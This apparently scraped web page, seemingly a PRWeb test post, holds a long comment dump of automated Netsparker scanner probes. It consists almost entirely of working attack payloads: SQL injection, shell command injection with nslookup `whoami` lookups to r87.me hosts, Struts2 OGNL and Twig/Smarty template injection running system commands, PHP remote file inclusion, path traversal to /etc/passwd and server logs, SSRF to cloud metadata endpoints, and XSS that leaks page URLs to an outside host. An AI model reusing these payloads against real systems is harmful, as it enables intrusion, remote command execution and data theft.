https://s3.amazonaws.com/prweb-wp-files/wp-content/uploads/2017/10/20153443/prweb-01.png
0
0
Maria Perez
https://s3.amazonaws.com/prweb-wp-files/wp-content/uploads/2017/10/20153443/prweb-01.png
Maria Perez2021-07-07 13:11:312021-07-07 13:11:333
testing 7.16.0
7.17.0 deployment test
Scroll to top
3
%27
NSFTW
‘+NSFTW+’
“&ping -w 25 127.0.0.1 &”
1″;expr 268409241 – 24146;”
‘&ping -w 25 127.0.0.1 &’
1″;expr 268409241 – 46391;”
1′;expr 268409241 – 18617;’
&ping -w 25 127.0.0.1 &
1′;expr 268409241 – 55401;’
ping -w 25 127.0.0.1 &
1;expr 268409241 – 71133;x
{{268409241-27693}}
ping -w 25 127.0.0.1
1;expr 268409241 – 24448;x
{{268409241-99615}}
expr 268409241 – 48425;
expr 268409241 – 13693;
expr 268409241 – 23452
expr 268409241 – 23564
http://r87.com/n
http://r87.com/n?.php
|expr${IFS}268409241${IFS}-${IFS}64957
|expr${IFS}268409241${IFS}-${IFS}91303
php://filter//resource=http://r87.com/n?.php
r87.com/n
N3tSp4rK3R
NS09<s1﹥DBLʺSNGLʹNS09
<!DOCTYPE ns []>&lfi;
ns:netsparker056650=vuln
&thisdoesntexists;
http://example.com/?
ns: netsparker056650=vuln
-1 OR 1=1
‘
NS-1NO
-1 AND ‘NS=’ss
<!DOCTYPE r [ %dtd;]>&a;
otdoy9sokzhtr-mlyogap3qeu7_teqtclxlkbif0bqc.r87.me
-1′ OR 1=1 OR ‘ns’=’ns
otdoy9sokzouesltsrzwqdtdutzpjsykmlqt6os5l-s.r87.me
-1″ OR 1=1 OR “ns”=”ns
//otdoy9sokzuvcxageynqbevjtkmtluqcjlcosqolati.r87.me
-1 OR 17-7=10
print(int)0xFFF9999-81063
//otdoy9sokzpy3bskwcktrytelugufapmkerzriimu-0.r87.me
-1 OR X=’ss
print(int)0xFFF9999-97358
-1′ OR 1=1 OR ‘1’=’1
http://r87.me/r/?id=otdoy9sokzwyspuk697famdedt9nnb9x9fejd8hlxjm
print(int)0xFFF9999-80433;
http://r87.me/r/?id=otdoy9sokzlqnzsj7ad7ijykoynmozsweqee5qeezem
-1″ OR 1=1 OR “1”=”1
print(int)0xFFF9999-21186;
http://otdoy9sokz38rwp5hd5eu76f8x9yvt0piocmgv1vqdd.r87.me/p/
+print(int)0xFFF9999-39637;//
http://otdoy9sokzb_-dmib-kljdbx03couwuuqxwtp2o7dyt.r87.me/p/
php://filter//resource=http://otdoy9sokzele7j3rghm_-2tgozpospskakifnkz7-9.r87.me/p/
php://filter//resource=http://otdoy9sokzkm2t28nho85w_4i3ow5cwbcweiyivq41x.r87.me/p/
+print(int)0xFFF9999-17815;//
otdoy9sokzhxd2y0jhgcore3yhpqlow4vzs-dglbb4j.r87.me/p/
otdoy9sokz80bdowsx-h8fu2bfdcbsv5fxm9flss8xj.r87.me/p/
‘+print(int)0xFFF9999-76787+’
‘+print(int)0xFFF9999-42172+’
“+print(int)0xFFF9999-23803+”
“+print(int)0xFFF9999-37891+”
{php}print(int)0xFFF9999-36826;{/php}
{php}print(int)0xFFF9999-33671;{/php}
‘{${print(int)0xFFF9999-72395}}’
‘{${print(int)0xFFF9999-59678}}’
[php]print(int)0xFFF9999-60357;[/php]
[php]print(int)0xFFF9999-76111;[/php]
%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’61430′).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,’SET /A 0xFFF9999 -‘ + #cmd}:{‘/bin/bash’,’-c’,’expr 268409241 – ‘ + #cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’28837′).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,’SET /A 0xFFF9999 -‘ + #cmd}:{‘/bin/bash’,’-c’,’expr 268409241 – ‘ + #cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
arguments[1].end(require(‘child_process’).execSync(‘expr 268409241 – 45121’))
arguments[1].end(require(‘child_process’).execSync(‘expr 268409241 – 76635’))
http://aws.r87.me/latest/meta-data/public-hostname
http://169.254.169.254/latest/meta-data/public-hostname
http://127.0.0.1:22
http://104.18.209.79:22
http://::1:22
http://[::1]:22
https://stage.prweb.com/server-status
http://169.254.169.254/opc/v1/instance
https://metadata.packet.net/metadata
‘”–>
gethostbyname(trim(‘otdoy9sokzuxfnrcnplpi2aupigkektwyxmm4sm7′.’hxk.r87.me’))
gethostbyname(trim(‘otdoy9sokzpugkg5_8wnwmjoqeqinikpg2cc9vem’.’ibq.r87.me’))
gethostbyname(trim(‘otdoy9sokz0rzda7khacwbp9w-ug69nrhgjwxto9′.’zwy.r87.me’));
“;l=document.createElement(“link”);l.rel=”prefetch”;l.href=”//otdoy9sokzpve9qpkqsie7sjk-h26ohdckxgedsn”+”fse.r87.me/r/?”+location.href;document.head.appendChild(l);//
gethostbyname(trim(‘otdoy9sokzplno__w8_miaig75njydlzz0ptmusd’.’2xw.r87.me’));
+gethostbyname(trim(‘otdoy9sokzflpmehkvokt5tskfsnbafc7lqztead’.’vvg.r87.me’));//
+gethostbyname(trim(‘otdoy9sokzpml_7sm7bdd5y-dp5_iivdt0gfloel’.’_i8.r87.me’));//
“;l=document.createElement(“link”);l.rel=”prefetch”;l.href=”//otdoy9sokz3och6e9xp7s2hpp8g_40_2g7fzfcgd”+”cia.r87.me/r/?”+location.href;document.head.appendChild(l);//
‘+gethostbyname(trim(‘otdoy9sokzdimg7h24fgne28z6hdzer1zuxvpeyz’.’7gc.r87.me’))+’
‘+gethostbyname(trim(‘otdoy9sokz33pxeplnfcsknqoxlegdanffnr1cr_’.’hh0.r87.me’))+’
‘;l=document.createElement(“link”);l.rel=”prefetch”;l.href=”//otdoy9sokzd8jdtggpqa43uthm9ovkxyl2tjwcd1″+”cok.r87.me/r/?”+location.href;document.head.appendChild(l);//
“+gethostbyname(trim(‘otdoy9sokzpiufjbpapd2fhk0rfgf187_xfrgx4h’.’nca.r87.me’))+”
“+gethostbyname(trim(‘otdoy9sokz3ulfobm9wrz0w-fmzlagq-jibtz9nd’.’ack.r87.me’))+”
‘{${gethostbyname(trim(‘otdoy9sokzkts9g8fexb2rgdy85_kfgpjij0iiys’.’5ce.r87.me’))}}’
‘{${gethostbyname(trim(‘otdoy9sokz5wujgoxou3ddq8kl5cawgdqsmlngxf’.’hxy.r87.me’))}}’
nslookup “otdoy9sokzxb-uacuo4nsosp4pfx5hk5ubbbl4ua””6tm.r87.me”
nslookup “otdoy9sokznowuvnpgz431eobx1b07yx7aj_o1fr””yti.r87.me”
&nslookup “otdoy9sokz7hvvchbl7y8bfutq8pll_53ck7rdca””zow.r87.me”
‘;l=document.createElement(“link”);l.rel=”prefetch”;l.href=”//otdoy9sokzc9ypxb1gv0ol7v-3xs4rrzpd8eptek”+”xwi.r87.me/r/?”+location.href;document.head.appendChild(l);//
&nslookup “otdoy9sokzpllf-c3ofy6qwc5p1zt5uvubpojfpz””hgm.r87.me”
‘&nslookup “otdoy9sokznnnni–prqzferu1n7mp5rboa11wmy””weq.r87.me”
‘&nslookup “otdoy9sokzsdocl_d8_vlrtkqiu_mqonhrjism70″”7yw.r87.me”
“&nslookup “otdoy9sokz4-m8k93so8d-jgtp-ilke2305qemfb””q48.r87.me”
“&nslookup “otdoy9sokz3clsofu-gubiwf6smy-05rkuvx4m7u””sbu.r87.me”
/../../../../../../../../../../proc/self/fd/2
|nslookup${IFS}”otdoy9sokzmseuofhjb3bsrmt2y5u0m3ts4lpmdq””0rm.r87.me”
|nslookup${IFS}”otdoy9sokz-qejo21um1czw0w3elm2e7rpbtfo-z””ass.r87.me”
/../../../../../../../../../../proc/self/fd/2.php
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’nslookup `whoami`.”otdoy9sokzrv1leestbnobeo1_ya3rnt1_civoqy””hkc.r87.me”‘).(#p=new java.lang.ProcessBuilder({‘/bin/bash’,’-c’,#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
/../../../../../../../../../../etc/httpd/logs/error.log
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’nslookup `whoami`.”otdoy9sokzvkguufxpmat9fizi2w4ex0yr9cnyo7″”h2q.r87.me”‘).(#p=new java.lang.ProcessBuilder({‘/bin/bash’,’-c’,#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
{php}Smarty_Resource::parseResourceName(system(“nslookup otdoy9sokzfau4szvr0pyqglpnslx_xokkdzsxlk”.”ypq.r87.me”),’b’);{/php}
{php}Smarty_Resource::parseResourceName(system(“nslookup otdoy9sokzngsstrdxiljjiafgu5fb9jzorkongz”.”jx0.r87.me”),’b’);{/php}
/../../../../../../../../../../etc/httpd/logs/error_log
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“nslookup otdoy9sokzgbffxu7x-5a_tvtduozcectqsq12os”~”ks4.r87.me”)}}
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“nslookup otdoy9sokzqc2lstprvitmjqljkozynfzk6haum4″~”6_s.r87.me”)}}
/../../../../../../../../../../var/log/apache2/error.log
/../../../../../../../../../../var/log/apache/error.log
/../../../../../../../../../../proc/version
/../../../../../../../../../../proc/version.php
/../../../../../../../../../../../etc/passwd
file:///etc/passwd
/../../../../../../../../../../../etc/passwd.php
…//…//…//…//…//…//…//…//…//…//…//etc/passwd
….//….//….//….//….//….//….//….//….//….//….//etc/passwd
…..///…..///…..///…..///…..///…..///…..///…..///…..///…..///…..///etc/passwd
. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd
1/../../../../../../../../../../../etc/passwd
/etc/passwd
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
data:;base64,TlM3NzU0NTYxNDQ2NTc1
wp-comments-post.php
/wp-comments-post.php
\wp-comments-post.php
WEB-INF/web.xml
/../../../../../../../../../../WEB-INF/web.xml
/../../../../../../../../../../var/log/apache2/access.log
/../../../../../../../../../../etc/httpd/logs/access.log
/../../../../../../../../../../var/log/nginx/access.log
/../../../../../../../../../../opt/lampp/logs/access_log
/../../../../../../../../../../var/log/lighttpd/access.log
/../../../../../../../../../../var/log/apache/access.log
n3tsp4rke2
nxtspxrkex
‘”–>netsparker(0x05CCAF)
‘”–>netsparker(0x05CCB0)
%27%22–%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x05CCC1%29%3C%2FscRipt%3E
%27%22–%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x05CCC2%29%3C%2FscRipt%3E
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDVDQ0NCKTwvc2NyaXB0Pg==
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDVDQ0NDKTwvc2NyaXB0Pg==
‘” ns=netsparker(0x05CCD4)
‘” ns=netsparker(0x05CCD5)
1 ns=netsparker(0x05CCDF)
1 ns=netsparker(0x05CCE0)
//r87.com/n/n.css?0x05CCF7
//r87.com/n/n.css?0x05CCF8
//r87.com/n/j/?0x05CD08
//r87.com/n/j/?0x05CD09
‘>
“>
javascript:netsparker(0x05CD56)
javascript:netsparker(0x05CD57)
ns(0x05CD62)
ns(0x05CD63)
n;ns:expression(netsparker(0x05CD76));
n;ns:expression(netsparker(0x05CD77));
body{x:expression(netsparker(0x05CD86))}
body{x:expression(netsparker(0x05CD87))}
*/netsparker(0x05CD92);/*
*/netsparker(0x05CD93);/*
‘+netsparker(0x05CD9E)+’
‘+netsparker(0x05CD9F)+’
“+netsparker(0x05CDCC)+”
“+netsparker(0x05CDCD)+”
\’;netsparker(0x05CDDC);///
\’;netsparker(0x05CDDD);///
',netsparker(0x05CDE4),'
',netsparker(0x05CDE5),'
netsparker(0x05CDEC)
netsparker(0x05CDED)
netsparker(0x05CE18);
netsparker(0x05CE19);
'+netsparker(0x05CE22)+'
'+netsparker(0x05CE23)+'
‘”@–>netsparker(0x05CE26)
‘”@–>netsparker(0x05CE27)
%22%2bnetsparker(0x05CE4B)%2b%22
%22%2bnetsparker(0x05CE4C)%2b%22
netsparker(0x05CE5F)
netsparker(0x05CE60)
//r87.com/?0x05CE75
//r87.com/?0x05CE76
ns@mail.ns‘”/>()%26%25netsparker(0x05CE85)
ns@mail.ns‘”/>()%26%25netsparker(0x05CE86)
'"–></style></scRipt><iMg src=N onerror=netsparker(0x05CE97)>
'"–></style></scRipt><iMg src=N onerror=netsparker(0x05CE98)>
'"><iMg src=N onerror=netsparker(0x05CEE1)>
'"><iMg src=N onerror=netsparker(0x05CEE2)>
<iMg src=N onerror=ns(0x05CF47)>
<iMg src=N onerror=ns(0x05CF48)>
'"–></style></scRipt><iMg src=N onerror=netsparker`0x05CF4D`>
'"–></style></scRipt><iMg src=N onerror=netsparker`0x05CF4E`>
'"><iMg src=N onerror=netsparker`0x05CF66`>
'"><iMg src=N onerror=netsparker`0x05CF67`>
<iMg src=N onerror=ns`0x05CF7F`>
<iMg src=N onerror=ns`0x05CF80`>
Content-Type:text/html
ns(0x05D04B)
Content-Type:text/html
ns(0x05D04C)
{{268409241-43870}}
{{268409241-1302}}
otdoy9sokzxhkqz6uzi2wz4ilxvz9-poiakggzqyacm.r87.me
3 OR 1=1
http://otdoy9sokz95e3kqhmetyms6cjuafd4oqi5ilec89bv.r87.me/p/
//otdoy9sokzqvdq0yy79qu6vybuj7uqfm7xh8i9xx-do.r87.me
3″;expr 268409241 – 2927;”
php://filter//resource=http://otdoy9sokzq_jvkn4vprqux36_quer24sxpbfagniuv.r87.me/p/
otdoy9sokzvg3ncqfxfgdmrsqcxfyzupodwomxxhoht.r87.me/p/
http://r87.me/r/?id=otdoy9sokzdxuddsmbwuyxn539l5acpsopnf1z9prby
3″;expr 268409241 – 59909;”
NS3NO
3′;expr 268409241 – 41373;’
3 AND ‘NS=’ss
3′;expr 268409241 – 55197;’
3′ OR 1=1 OR ‘ns’=’ns
3″ OR 1=1 OR “ns”=”ns
3;expr 268409241 – 5995;x
3 OR 17-7=10
3 OR X=’ss
3;expr 268409241 – 26850;x
3′ OR 1=1 OR ‘1’=’1
expr 268409241 – 80083;
3″ OR 1=1 OR “1”=”1
expr 268409241 – 31444;
expr 268409241 – 63085
expr 268409241 – 68914
|expr${IFS}268409241${IFS}-${IFS}82038
|expr${IFS}268409241${IFS}-${IFS}80206
print(int)0xFFF9999-38068
print(int)0xFFF9999-97319
print(int)0xFFF9999-62487;
print(int)0xFFF9999-91521;
+print(int)0xFFF9999-74916;//
gethostbyname(trim(‘otdoy9sokzr-z5aip9frzzmtmr1kfvyf8zaodsfw’.’u7u.r87.me’))
+print(int)0xFFF9999-30308;//
gethostbyname(trim(‘otdoy9sokzoh4mhhd1mcazgsijextiy5anpkvxed’.’v3q.r87.me’));
‘+print(int)0xFFF9999-47788+’
+gethostbyname(trim(‘otdoy9sokzimmbf_0cdt5wr5pxfeecilrzzmhqwq’.’1gk.r87.me’));//
‘+print(int)0xFFF9999-5592+’
‘+gethostbyname(trim(‘otdoy9sokzddppubkbfd9dhzly-7xyogl3vzr00l’.’xs8.r87.me’))+’
“+print(int)0xFFF9999-70541+”
“+gethostbyname(trim(‘otdoy9sokzfjotqgbbb6pwwav8s8vpayur_uxkik’.’odk.r87.me’))+”
“+print(int)0xFFF9999-74061+”
‘{${gethostbyname(trim(‘otdoy9sokzy14_2cw8humyuszie7vefevnb8l41p’.’kpi.r87.me’))}}’
{php}print(int)0xFFF9999-25150;{/php}
nslookup “otdoy9sokz84zckzadczenthenbzmypom_ouxhal””fzo.r87.me”
{php}print(int)0xFFF9999-20764;{/php}
&nslookup “otdoy9sokz4itb1l8jzbuwvmjvf2vyly8t93ywuc””jcw.r87.me”
‘{${print(int)0xFFF9999-50985}}’
‘&nslookup “otdoy9sokz5pnlaaw9apb-poou_vpnvzuxg3pijk””qt0.r87.me”
‘{${print(int)0xFFF9999-34187}}’
“&nslookup “otdoy9sokzclyfy21-juuqen3kqpmjuolnjqf-of””unc.r87.me”
[php]print(int)0xFFF9999-70080;[/php]
|nslookup${IFS}”otdoy9sokzmnnrfe9tairnc4kgrcaenyzjyxl_rx””0d4.r87.me”
[php]print(int)0xFFF9999-18576;[/php]
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’nslookup `whoami`.”otdoy9sokz3pu61kyra1vi63byevrjesd1vjnhdy””fds.r87.me”‘).(#p=new java.lang.ProcessBuilder({‘/bin/bash’,’-c’,#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
{php}Smarty_Resource::parseResourceName(system(“nslookup otdoy9sokzrxeysknblg2fwmko9gwvnhkixnuy42″.”uym.r87.me”),’b’);{/php}
%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’95630′).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,’SET /A 0xFFF9999 -‘ + #cmd}:{‘/bin/bash’,’-c’,’expr 268409241 – ‘ + #cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“nslookup otdoy9sokztaqaqmpldwtvafh03mrafggtp05-fq”~”tdq.r87.me”)}}
arguments[1].end(require(‘child_process’).execSync(‘expr 268409241 – 77445’))
arguments[1].end(require(‘child_process’).execSync(‘expr 268409241 – 60649’))
3/../../../../../../../../../../../etc/passwd
“;l=document.createElement(“link”);l.rel=”prefetch”;l.href=”//otdoy9sokzklfhkby4wg7cp04gn_wvbkyfhyzusg”+”qfy.r87.me/r/?”+location.href;document.head.appendChild(l);//
‘;l=document.createElement(“link”);l.rel=”prefetch”;l.href=”//otdoy9sokzpn-2pkn23stggmqv6p0w3ojtuegya5″+”adi.r87.me/r/?”+location.href;document.head.appendChild(l);//
‘”–>netsparker(0x06C5B1)
%27%22–%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x06C5B7%29%3C%2FscRipt%3E
%27%22–%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x06C5B8%29%3C%2FscRipt%3E
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDZDNUMzKTwvc2NyaXB0Pg==
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDZDNUM0KTwvc2NyaXB0Pg==
‘” ns=netsparker(0x06C5C9)
1 ns=netsparker(0x06C5CF)
//r87.com/n/n.css?0x06C5D9
//r87.com/n/n.css?0x06C5DA
//r87.com/n/j/?0x06C5E3
//r87.com/n/j/?0x06C5E4
javascript:netsparker(0x06C5F1)
ns(0x06C5F7)
n;ns:expression(netsparker(0x06C5FB));
body{x:expression(netsparker(0x06C601))}
*/netsparker(0x06C603);/*
‘+netsparker(0x06C60C)+’
“+netsparker(0x06C612)+”
\’;netsparker(0x06C61C);///
',netsparker(0x06C623),'
netsparker(0x06C633)
netsparker(0x06C63F);
'+netsparker(0x06C64F)+'
‘”@–>netsparker(0x06C663)
%22%2bnetsparker(0x06C68B)%2b%22
netsparker(0x06C6AD)
//r87.com/?0x06C6BB
//r87.com/?0x06C6BC
ns@mail.ns‘”/>()%26%25netsparker(0x06C723)
'"–></style></scRipt><iMg src=N onerror=netsparker(0x06C737)>
'"><iMg src=N onerror=netsparker(0x06C743)>
<iMg src=N onerror=ns(0x06C76D)>
'"–></style></scRipt><iMg src=N onerror=netsparker`0x06C7C3`>
'"–></style></scRipt><iMg src=N onerror=netsparker`0x06C7C4`>
'"><iMg src=N onerror=netsparker`0x06C80C`>
'"><iMg src=N onerror=netsparker`0x06C80D`>
<iMg src=N onerror=ns`0x06C81C`>
Lot of spamming issue here